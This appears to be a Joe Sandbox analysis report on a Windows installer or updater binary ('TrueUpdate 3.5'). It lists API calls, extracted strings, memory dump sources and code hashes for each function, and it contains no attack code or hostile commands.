                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3332788312-0
                                                                                                                • Opcode ID: 2f039f0fc31fecbdcac67ecd7a94f3bbace289618eba1bc2681dcdd903cbdd7d
                                                                                                                • Instruction ID: dd2873b391f69817bde92f91f5f7798a798dc3d4c8ff5fde14c979dea33df2ed
                                                                                                                • Opcode Fuzzy Hash: 2f039f0fc31fecbdcac67ecd7a94f3bbace289618eba1bc2681dcdd903cbdd7d
                                                                                                                • Instruction Fuzzy Hash: F9414779900619EFCF50CF94D888AEEB7B5FF48340B1541AEE905A7211CB389E41CBA9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00418937
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041BA62: __EH_prolog.LIBCMT ref: 0041BA67
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0041C471: __EH_prolog.LIBCMT ref: 0041C476
                                                                                                                  • Part of subcall function 0041C471: GetTempPathA.KERNEL32(00000104,?), ref: 0041C52F
                                                                                                                  • Part of subcall function 0041C471: GetTempFileNameA.KERNEL32(?,IRWIN,00000000,?), ref: 0041C549
                                                                                                                  • Part of subcall function 0041C471: SetFileAttributesA.KERNEL32(?,00000080), ref: 0041C55B
                                                                                                                  • Part of subcall function 0041C471: DeleteFileA.KERNEL32(?), ref: 0041C568
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 0041A33B: __EH_prolog.LIBCMT ref: 0041A340
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$FileInterlocked$IncrementTemp$AttributesDecrementDeleteNamePathlstrlen
                                                                                                                • String ID: 0:R$Content-Type: application/x-www-form-urlencoded$Incorrect HTTP status returned by server: %d$MSG_INITIALIZING$TrueUpdate 3.5
                                                                                                                • API String ID: 716760990-2677761981
                                                                                                                • Opcode ID: 2a05be3a193107ff33914d025b806101e9a4f7c69246c4ba78369640d6c6722e
                                                                                                                • Instruction ID: 7ad473c514a72808bbc6291213c6efbab76e7b9ada64fe613558528b0dac4d64
                                                                                                                • Opcode Fuzzy Hash: 2a05be3a193107ff33914d025b806101e9a4f7c69246c4ba78369640d6c6722e
                                                                                                                • Instruction Fuzzy Hash: E9125D75900249EFCF14EFA5C985EEEBBB9BF14304F00415EF506A3281DB78AA84CB65
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 004BC1BE
                                                                                                                • GetLastError.KERNEL32 ref: 004BC1CA
                                                                                                                • GetFileType.KERNEL32(00000000), ref: 004BC1DF
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004BC1EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateErrorHandleLastType
                                                                                                                • String ID: @$H
                                                                                                                • API String ID: 1809617866-104103126
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043091A
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiEnumPatchesA), ref: 00430968
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                  • Part of subcall function 004AF0B8: RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen$AddressFreeHeapLibraryLoadProc
                                                                                                                • String ID: 0:R$MsiEnumPatchesA$PatchCode$TransformList
                                                                                                                • API String ID: 1053048375-1542265820
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424358
                                                                                                                • __ftol.LIBCMT ref: 00424367
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                  • Part of subcall function 0045468E: SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 004546DE
                                                                                                                  • Part of subcall function 0045468E: SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 004546EF
                                                                                                                  • Part of subcall function 0045468E: SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 0045472E
                                                                                                                  • Part of subcall function 0045468E: SendMessageA.USER32(?,0000019A,-00000001,00000000), ref: 00454762
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog__ftol
                                                                                                                • String ID: Checked$ItemData$Selected$Text
                                                                                                                • API String ID: 4274534877-779246079
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004283A0
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 00428425
                                                                                                                • ShellExecuteA.SHELL32(?,open,00000000,?,00000000,00000000), ref: 00428470
                                                                                                                • ShellExecuteA.SHELL32(?,00000000,00000000,?,00000000,00000000), ref: 004284C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$ExecuteShell$__ftollstrlen
                                                                                                                • String ID: $open
                                                                                                                • API String ID: 899862102-119239145
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004303AC
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiGetShortcutTargetA), ref: 004303F3
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen$AddressLibraryLoadProc
                                                                                                                • String ID: 0:R$ComponentCode$FeatureId$MsiGetShortcutTargetA
                                                                                                                • API String ID: 730962311-3930607590
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Source was less than 4 characters, xrefs: 0044409F
                                                                                                                • Source ends with a slash, xrefs: 00444131
                                                                                                                • Source contains invalid character, xrefs: 00444182
                                                                                                                • Source was empty, xrefs: 0044407E
                                                                                                                • Source did not have drive specifier, xrefs: 004440F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Source contains invalid character$Source did not have drive specifier$Source ends with a slash$Source was empty$Source was less than 4 characters
                                                                                                                • API String ID: 3519838083-1937954483
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Destination did not have drive specifier, xrefs: 00444246
                                                                                                                • Destination was less than 2 characters, xrefs: 00444203
                                                                                                                • Destination contains invalid character, xrefs: 004442BC
                                                                                                                • Destination was empty, xrefs: 004441EE
                                                                                                                • Source includes wildcards but destination has a file name at the end, xrefs: 004442ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Destination contains invalid character$Destination did not have drive specifier$Destination was empty$Destination was less than 2 characters$Source includes wildcards but destination has a file name at the end
                                                                                                                • API String ID: 3519838083-2371027411
                                                                                                                • Opcode ID: 11ad46ddd213795edeabb213814f3fea095e49d02d1329c029afe43c78a322ae
                                                                                                                • Instruction ID: e728cf5abf40f8b6c25cba219de29e8f1bd5826e9a65f2d28502286fbbff087a
                                                                                                                • Opcode Fuzzy Hash: 11ad46ddd213795edeabb213814f3fea095e49d02d1329c029afe43c78a322ae
                                                                                                                • Instruction Fuzzy Hash: 4C410934B002409BDB14EF29C496FBE77A1AF85774F14831FF521972D1CBB95981824A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424210
                                                                                                                • __ftol.LIBCMT ref: 00424222
                                                                                                                Similarity
                                                                                                                • API ID: __ftol$H_prolog
                                                                                                                • String ID: Checked$ItemData$Selected$Text
                                                                                                                • API String ID: 2516785518-779246079
                                                                                                                • Opcode ID: a35c3e90b4fe907689026ab3e3feba8a64bfb34938237e79568cab6737b08971
                                                                                                                • Instruction ID: 7dbbf9e458c36e5749a9129b95461df057a6c111d5b48fc50b55a5daca1ce7d6
                                                                                                                • Opcode Fuzzy Hash: a35c3e90b4fe907689026ab3e3feba8a64bfb34938237e79568cab6737b08971
                                                                                                                • Instruction Fuzzy Hash: 2231E671600210BAD7117BA78C82FBF366CDFC1B98F14440FF9056A192DB6D5D8267AE
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 004605D9
                                                                                                                • GetNextDlgTabItem.USER32(?,?,?), ref: 00460601
                                                                                                                • GetNextDlgTabItem.USER32(00000000,00000000,?), ref: 00460671
                                                                                                                  • Part of subcall function 004C932E: GetDlgItem.USER32(?,?), ref: 004C933C
                                                                                                                • IsWindow.USER32(?), ref: 004606C8
                                                                                                                Similarity
                                                                                                                • API ID: Item$NextWindow
                                                                                                                • String ID: !$tTQ
                                                                                                                • API String ID: 3345120248-2224091262
                                                                                                                • Opcode ID: 494654775a3f53cb91d98aefb662bad36c9c0441901bfd4f55049fd52177b9a4
                                                                                                                • Instruction ID: b77a0f2f3527bad80a4bab2de26ea082354b571cbcc979fd8a8c299e6b3a3192
                                                                                                                • Opcode Fuzzy Hash: 494654775a3f53cb91d98aefb662bad36c9c0441901bfd4f55049fd52177b9a4
                                                                                                                • Instruction Fuzzy Hash: 0631C1716042529FCB258F29C848A6FB7A9EFC4751F05022EE802DB2A1DB34CC11CB99
                                                                                                                APIs
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0045846B
                                                                                                                • GetObjectA.GDI32(?,0000000C,?), ref: 00458482
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0045849D
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004584B8
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004584BB
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004584D1
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 004584FD
                                                                                                                Similarity
                                                                                                                • API ID: BrushColorCreateSolid$Object
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949401836-0
                                                                                                                • Opcode ID: 62c2c0b5e8d092c46cb0eaaf2b58ccf12773ce50326d95b7c6a4c558317b4346
                                                                                                                • Instruction ID: 5fd8f3a04d7d7f6dbd2283b6caeb19ace0a1c8af8b2773bb235d4debcd9c45a8
                                                                                                                • Opcode Fuzzy Hash: 62c2c0b5e8d092c46cb0eaaf2b58ccf12773ce50326d95b7c6a4c558317b4346
                                                                                                                • Instruction Fuzzy Hash: DE21B134600611EFCB51AB25C884B2EB3E5BF48B45F01412EED56AB752DF38EC09CB99
                                                                                                                APIs
                                                                                                                • InterlockedIncrement.KERNEL32(00526E2C), ref: 004B4B12
                                                                                                                • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B27
                                                                                                                  • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                                                  • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                                                • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B56
                                                                                                                • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B9B
                                                                                                                • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4BC0
                                                                                                                  • Part of subcall function 004B6355: RtlLeaveCriticalSection.NTDLL ref: 004B6362
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked$Decrement$CriticalSection$EnterIncrementInitializeLeave
                                                                                                                • String ID: ,nR
                                                                                                                • API String ID: 2133288049-2953646183
                                                                                                                • Opcode ID: 06353121966184c96b89915dd8aff122bb503d95dbead61f9003243a5f485708
                                                                                                                • Instruction ID: 022256119f148c4c2e779ce32b5b478b08c6e2fbaaf7fc2c74051299f02b724c
                                                                                                                • Opcode Fuzzy Hash: 06353121966184c96b89915dd8aff122bb503d95dbead61f9003243a5f485708
                                                                                                                • Instruction Fuzzy Hash: 60212C31408204FADF117F559C81FDE7768AF91325F21012FF214161C3DA7CE942A639
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004C82CC
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004C82E6
                                                                                                                • ScreenToClient.USER32(?,?), ref: 004C82F9
                                                                                                                • ScreenToClient.USER32(?,?), ref: 004C8302
                                                                                                                • EqualRect.USER32(?,?), ref: 004C830C
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 004C8334
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 004C834C
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 443303494-0
                                                                                                                • Opcode ID: 18b85774aa58995e3236296be1b4092650a87eded5494399d91a840405cafc11
                                                                                                                • Instruction ID: ac089cc528e89377b988b5bdcd533a9f7ec59a469f36123118a614ed86cc77a1
                                                                                                                • Opcode Fuzzy Hash: 18b85774aa58995e3236296be1b4092650a87eded5494399d91a840405cafc11
                                                                                                                • Instruction Fuzzy Hash: 76114F75600249BFE7108F68DC88EBB7BBDEB98750F10852EB91597265EB31ED008B64
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: %.6x$dec$format$h$hex
                                                                                                                • API String ID: 3519838083-702273395
                                                                                                                • Opcode ID: 93acad5bdd7aaba1011b209201bc856cd8f6d7e101bb031f621f958fdc823553
                                                                                                                • Instruction ID: 117082e35f7c37181ea1e7285ce6b1896d589c41310ddc10f6cbb96157a5ac15
                                                                                                                • Opcode Fuzzy Hash: 93acad5bdd7aaba1011b209201bc856cd8f6d7e101bb031f621f958fdc823553
                                                                                                                • Instruction Fuzzy Hash: 9C21D171A00629ABCF12DFA9DC01AEFBBB5FF84714F00841AB815A7281C6B49A11D798
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(Sfc.dll), ref: 004104BB
                                                                                                                • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004104CF
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0041050A
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00410524
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressByteCharFreeLoadMultiProcWide
                                                                                                                • String ID: Sfc.dll$SfcIsFileProtected
                                                                                                                • API String ID: 344494338-411519151
                                                                                                                APIs
                                                                                                                • IsBadStringPtrA.KERNEL32(00000000,00000000), ref: 004A076F
                                                                                                                • lstrlen.KERNEL32(00000000,?,00000000,?), ref: 004A0781
                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000), ref: 004A0794
                                                                                                                • WriteFile.KERNEL32(?,00511394,00000002,?,00000000), ref: 004A07A5
                                                                                                                • WriteFile.KERNEL32(?,???,00000005,?,00000000), ref: 004A07C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite$Stringlstrlen
                                                                                                                • String ID: ???
                                                                                                                • API String ID: 3955047007-928449859
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004081DA
                                                                                                                • GetSysColor.USER32(00000012), ref: 004081E1
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004081EB
                                                                                                                • GetSysColor.USER32(00000012), ref: 004081F5
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004081FF
                                                                                                                • GetSysColor.USER32(00000012), ref: 00408209
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,0040734C), ref: 0040821F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1573920590-0
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(WININET.DLL,?,?,00440790), ref: 00440A01
                                                                                                                • LoadLibraryExA.KERNEL32(WININET.DLL,00000000,00000008,?,?,00440790), ref: 00440A11
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 00440A23
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00440790), ref: 00440A35
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                                                • String ID: InternetGetConnectedState$WININET.DLL
                                                                                                                • API String ID: 2632591731-246962726
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(00000001,004EF9B4,00000001,000000FF,00000100,00000001,000000FF,00000000,?), ref: 004B8205
                                                                                                                • GetStringTypeA.KERNEL32(00000000,00000001,004EF9B0,00000001,?), ref: 004B821F
                                                                                                                • GetStringTypeA.KERNEL32(000000FF,000000FF,00000000,00000000,?,00000100,00000001,000000FF,00000000,?), ref: 004B8253
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000100,00000001,000000FF,00000000,?), ref: 004B828B
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000000,?,?), ref: 004B82E1
                                                                                                                • GetStringTypeW.KERNEL32(000000FF,?,00000000,?,?,?), ref: 004B82F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringType$ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852931651-0
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 0045899C
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00458A28
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00458A35
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00458A94
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00458AA4
                                                                                                                • PostMessageA.USER32(?,?,?,?), ref: 00458AC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientScreen$MessageParentPost
                                                                                                                • String ID:
                                                                                                                • API String ID: 1061243768-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0042079B
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 004207C4
                                                                                                                • __ftol.LIBCMT ref: 004207D6
                                                                                                                • IsWindow.USER32(?), ref: 0042081C
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420839
                                                                                                                • SendMessageA.USER32(?,00000150,-00000001,00000000), ref: 00420851
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
